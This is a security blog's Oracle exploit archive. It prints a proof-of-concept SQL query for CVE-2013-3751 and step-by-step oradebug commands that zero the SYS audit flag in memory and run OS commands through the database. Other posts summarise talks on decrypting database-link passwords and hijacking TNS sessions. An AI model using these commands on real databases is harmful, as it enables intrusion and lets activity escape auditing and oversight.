Archive for the ‘Exploit’ Category

Oracle CPU July 2014 + Oracle Exploit CVE-2013-3751

Mittwoch, Juli 16th, 2014

Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).

After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.

This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1

Timeline of CVE-2013-3751:

  • January 2012: Vulnerability found (fuzzing)
  • February 2012: Vulnerability reported to ZDI
  • March 2012: Vulnerability contracted $500
  • November 2012: Reported to Oracle by ZDI
  • July 2013: Patch published by Oracle
  • March 2014: Oracle’s Cloud still not patched
  • June 2014: Exploit released at INS#14 conference
  • July 2014: Patch for Oracle 12.1 published by Oracle

 

Exploit:

———-

select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a &lt; b]"/>}') like '0wn3d_again';

———-

Decrypt Oracle 11.2.0.3 and 12.1.0.1 database link passwords

Mittwoch, Oktober 2nd, 2013

At Derbycon 3.0, László Tóth and Ferenc Spala  gave a a new presentation „What’s common in Oracle and Samsung? They tried to think differently… “ (Video). The main focus of the presentation was the Samsung encryption and a new framework called sandy but there was also a small Oracle part.

Laszlo and Ferenc showed how to decrypt Oracle database links in Oracle 11.2.0.3 and Oracle 12.1.0.1 using a small utility called „oradecrlink.py“. In previous versions Oracle used DES to encrypt/decrypt database links. These database link passwords start with „05“ (Oracle’s indicator for DES).

 

Disable Auditing and running OS commands using oradebug

Samstag, September 17th, 2011

Currently I am staying at the Hacktivity 2011 conference in Budapest. I talked about Oracle Forensics (pdf of the presentation).The second talk was given by Laszlo Toth.  He showed at lot of interesting things, e.g. how to disable Oracle Audit and SYS Auditing using oradebug. His presentation will be available soon on his sooner or later webpage soonerorlater.hu.

oradebug is an undocumented (from Oracle) feature in all versions of Oracle which allows powerful activities if you have SYSDBA privileges (and getting SYSDBA privileges is easy as DBA). The peek/poke statement allows to read/modify the memory of the database:

Sample – disable Oracle SYS Auditing:


sqlplus / as sysdba

SQL> — get the offset for oradebug

SQL> select fsv.KSMFSNAM,sga.*
from x$ksmfsv fsv, x$ksmmem sga
where sga.addr=fsv.KSMFSADR
and fsv.ksmfsnam like ‚kzaflg_%‘;

KSMFSNAM ADDR INDX INST_ID KSMMMVAL
—————- ———- ———- —————-
kzaflg_ 0000000060031BB0 26652 1 0000000000000001

SQL> show parameter audit;

NAME TYPE VALUE
———————————— ———– ——————————
audit_file_dest string /u01/app/oracle/admin/PSALES/adump
audit_sys_operations boolean TRUE
audit_syslog_level string
audit_trail string DB, EXTENDED

SQL> oradebug poke 0x60031bb0 1 0
BEFORE: [060031BB0, 060031BB4) = 00000001
AFTER: [060031BB0, 060031BB4) = 00000000

oradebug can also be used to disable standard auditing. oradebug makes Oracle products like Oracle Auditvault nearly useless because Oracle Auditvault relies on Oracle native auditing. A (SYS)DBA can switch off auditing for a few seconds, do activities without being audited and switch auditing on again. .

Another trick from Laszlo’s presentation was how to use oradebug to call OS commands via the database

SQL> oradebug call system „ls -la >/tmp/hacktivity.txt“

Later I will talk about Laszlo’s trick how to disable the Oracle authentication using oradebug.

Blackhat Training „HACKING AND SECURING ORACLE (2 days) „

Mittwoch, April 13th, 2011

Blackhat 2010 Presentation „Oracle, Interrupted: Stealing Sessions and Credentials“ online

Sonntag, April 18th, 2010

 The Blackhat Europe 2010 „Oracle, Interrupted: Stealing Sessions and Credentials“ (presentation, whitepaper) of Steve Ocepek and Wendel G. Henrique are online. An interview with Steve about the talk can be found here.

As mentioned in a previous blog post this talk  shows how to intercept unencrypted (=default) TNS connections and inject statements into a running session. Steve and Wendel will soon release 2 tools Vamp and thicknet.

I will try to present these tools at the DOAG Expertenseminar in Berlin.

DOAG Expertenseminar

A good summary of the talk can be found at Peter Van Eeckhoutten’s blog.